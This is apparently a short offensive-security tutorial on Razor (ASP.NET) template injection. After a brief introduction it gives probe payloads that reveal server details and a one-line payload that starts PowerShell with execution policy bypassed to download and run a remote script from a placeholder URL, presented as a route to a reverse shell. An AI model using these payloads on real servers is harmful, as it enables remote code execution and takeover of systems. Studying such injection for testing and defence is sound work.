ASP Razor Basic Code Execution

What is Razor ?

Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.

Razor is based on ASP.NET, and designed for creating web applications. It has the power of traditional ASP.NET markup, but it is easier to use, and easier to learn.

For more information, please visit the following links:

https://docs.microsoft.com/aspnet/core/mvc/views/razor?view=aspnetcore-2.1

https://www.w3schools.com/asp/razor_intro.asp

Razor Code Execution

<html lang="en">
<head>
     <meta charset="utf-8" />
     <title>Web Pages Demo</title>
</head>
<body>
     <h1>Hello Web Pages</h1>
     <p>The time is @DateTime.Now</p>
</body>
</html>

Result:

We can also use other basic PoCs here

@Decimal.Add(7, 7)
@AppContext.BaseDirectory
@Environment.MachineName

Eventually, we can also go directly for a reverse shell. Small payload here:

@System.Diagnostics.Process.Start(“powershell.exe”,”-ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString(‘http://url/script.ps1’))

You will find a good explanation and a good case at the following link: https://www.scip.ch/en/?labs.20170105

Leave a Comment